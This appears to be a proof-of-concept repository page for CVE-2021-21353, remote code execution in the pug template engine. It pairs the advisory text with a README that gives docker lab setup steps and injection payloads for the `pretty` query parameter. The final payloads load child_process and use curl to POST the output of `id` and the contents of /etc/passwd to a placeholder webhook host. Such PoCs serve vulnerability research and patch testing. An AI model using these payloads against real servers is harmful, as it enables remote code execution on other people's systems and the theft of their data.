
CVE-2021-21353 PoC — Remote code execution in pug

Associated Vulnerability
Title: Remote code execution in pug (CVE-2021-21353)
Description: Pug is an npm package which is a high-performance template engine. In pug before version 3.0.1, if a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend. This is fixed in version 3.0.1. This advisory applies to multiple pug packages including "pug", "pug-code-gen". pug-code-gen has a backported fix at version 2.0.3. This advisory is not exploitable if there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade.
Readme
# PUG-RCE (CVE-2021-21353) POC

## Vulnerability information
CVE number: CVE-2021-21353  
CVSS score: 8.1  

< Vulnerable versions >  
pug_version <= 3.0.0  
2.0.3 < pug-code-gen version, 3.0.0 <= pug-code-gen version < 3.0.2

----

## Environment setup
`git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git`  
`cd PUG-RCE-CVE-2021-21353-POC`  
`sudo docker compose up`  

※ Reachable on port 3000

----

## Payload
Payload test  
`?pretty=');console.log('executed');//`  

Final payload  
`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('`  

`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('`
File Snapshot

[4.0K] /data/pocs/90fe387b16225f7d9fa8b12ff0b024a424daef16
├── [4.0K] app
│   ├── [ 303] index.js
│   ├── [ 173] package.json
│   └── [4.0K] views
│       └── [ 119] template.pug
├── [ 137] docker-compose.yml
├── [  99] Dockerfile
└── [ 786] README.md

2 directories, 6 files